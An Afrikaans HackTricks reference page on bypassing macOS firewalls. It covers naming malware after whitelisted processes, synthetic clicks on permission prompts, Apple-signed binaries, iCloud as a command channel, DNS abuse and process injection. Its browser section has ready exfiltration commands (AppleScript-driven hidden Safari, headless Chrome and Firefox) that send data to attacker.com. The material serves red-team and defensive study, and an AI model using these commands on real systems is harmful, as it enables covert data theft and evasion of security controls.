macOS Bypassing Firewalls
Reading time: 3 minutes
tip
Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.
Gevonde tegnieke
Die volgende tegnieke is gevind wat werk in sommige macOS firewall-apps.
Misbruik van witlys name
- Byvoorbeeld om die malware te noem met name van bekende macOS prosesse soos
launchd
Sintetiese Klik
- As die firewall om toestemming van die gebruiker vra, laat die malware klik op toelaat
Gebruik Apple-onderteken binaries
- Soos
curl
, maar ook ander sooswhois
Bekende apple domeine
Die firewall kan verbinding met bekende apple domeine soos apple.com
of icloud.com
toelaat. En iCloud kan as 'n C2 gebruik word.
Generiese Bypass
Sommige idees om te probeer om firewalls te omseil
Kontroleer toegelate verkeer
Om die toegelate verkeer te ken, sal jou help om potensieel gewhitelist domeine of watter toepassings toegelaat word om toegang tot hulle te verkry.
lsof -i TCP -sTCP:ESTABLISHED
Misbruik van DNS
DNS-resolusies word gedoen via mdnsreponder
onderteken toepassing wat waarskynlik toegelaat sal word om DNS-bedieners te kontak.
Deur Blaaier toepassings
- oascript
tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell
- Google Chrome
"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"
- Firefox
firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"
- Safari
open -j -a Safari "https://attacker.com?data=data%20to%20exfil"
Deur prosesinjekties
As jy kode in 'n proses kan inspuit wat toegelaat word om met enige bediener te verbind, kan jy die firewall beskerming omseil:
Verwysings
tip
Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.